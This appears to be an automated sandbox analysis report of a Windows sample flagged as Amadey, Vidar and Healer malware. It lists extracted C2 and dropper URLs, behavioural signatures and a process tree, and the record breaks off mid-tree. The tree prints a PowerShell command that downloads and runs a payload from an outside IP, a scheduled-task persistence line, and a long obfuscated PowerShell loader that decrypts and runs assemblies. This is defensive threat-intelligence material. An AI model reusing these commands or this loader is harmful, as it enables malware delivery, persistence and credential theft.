Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250207-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08/02/2025, 07:07

General

  • Target

    bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe

  • Size

    938KB

  • MD5

    d77cd6108c4916eb0cc768426b0bf4ad

  • SHA1

    54e3f788bd1d1a1087459170b0c0f24197565f72

  • SHA256

    bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f

  • SHA512

    22b81e6a3cbd5eae12e7e856b7c79432327978a53046d6099f4e3b957c6cbfe3264a1fcf073eb04beedcee6ff28b63ff60379429d32f1aaeafd1aee8ea63c5ea

  • SSDEEP

    24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8ayDFh:aTvC/MTQYxsWR7ayDX

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 5 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 9 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 57 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe
    "C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn qMNiEmakmJD /tr "mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn qMNiEmakmJD /tr "mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2776
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3536
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3088
        • C:\Users\Admin\AppData\Local\TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE
          "C:\Users\Admin\AppData\Local\TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1196
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4040
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1072393041\b6V4Rod.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2196
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2324
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp 
([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4656
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  8⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4836
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:708
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1072396041\b6V4Rod.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3244
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4332
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp 
([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1912
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1464
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3208
            • C:\Users\Admin\AppData\Local\Temp\1072397001\Bjkm5hE.exe
              "C:\Users\Admin\AppData\Local\Temp\1072397001\Bjkm5hE.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4624
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:668
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe982cc40,0x7fffe982cc4c,0x7fffe982cc58
                  8⤵
                    PID:1856
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1936 /prefetch:2
                    8⤵
                      PID:2724
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2176 /prefetch:3
                      8⤵
                        PID:4816
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2456 /prefetch:8
                        8⤵
                          PID:3868
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3216 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:4196
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3276 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:1436
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4548 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:3840
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4516,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4772 /prefetch:8
                          8⤵
                            PID:3796
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4784 /prefetch:8
                            8⤵
                              PID:3956
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4908,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4872 /prefetch:8
                              8⤵
                                PID:2636
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4756 /prefetch:8
                                8⤵
                                  PID:2900
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                7⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:4996
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe98346f8,0x7fffe9834708,0x7fffe9834718
                                  8⤵
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1876
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
                                  8⤵
                                    PID:448
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
                                    8⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4900
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
                                    8⤵
                                      PID:3684
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:1940
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:3352
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:4032
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:384
                                • C:\Users\Admin\AppData\Local\Temp\1072398001\7fOMOTQ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072398001\7fOMOTQ.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
